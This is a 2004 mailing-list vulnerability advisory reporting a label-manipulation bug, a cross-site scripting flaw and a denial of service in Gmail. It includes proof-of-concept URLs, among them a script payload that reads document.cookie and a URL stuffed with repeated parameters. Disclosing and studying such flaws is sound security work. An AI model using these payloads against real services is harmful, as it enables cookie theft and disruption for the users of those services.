Date:  Sat, 20 Nov 2004 03:37:04 +0100
From:  Lostmon <lostmon@gmail.com>
Subject:  multiples vulnerabilities in gmail service (XSS, Denial of Service,)

 
 
#######################################
Denial of service On gmail account
vendor url: http://gmail.google.com/
vendor notified:yes exploit included :yes
original advisore:http://lostmon.spymac.net/blog/
########################################
 
wen a user have active the Gmail´s cookie a user can create a special URL  to
Gmail service have these two vulnerabilities :
 
1- change a name of button of "remove label" and can create a Ghost categorie.
 
http://gmail.google.com/gmail?search=cat&cat=[label_name]&view=tl&start=0&zx=18acabd2
b173f0d81040559556&fs=1
 
2 .variable xz no validate properly the imput and can permit execute XSS code 
 
 
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f
0d81040559556[XSS-code]&fs=1
 
3.Denial of service fs variable not count how many times is in url and ,,,,
 
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f
0d81040559556&fs=%3Cscript%3Ealert(
document.cookie)%3C%2Fscript%3E&fs=1
 
or 
 
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=18acabd2b173f
0d81040559556&fs=%3Cscript%3Ealert(
document.cookie)%3C%2Fscript%3E&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs
=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&
fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1&fs=1
 
nice :)
 
atentamente:
 
Lostmon
 
 
thnx to http://www.ayuda-internet.net for their support 
Thnx to Rottew and ismax
Thx to estrella to be my ligth 
 
La curiosidad es lo que hace mover la mente....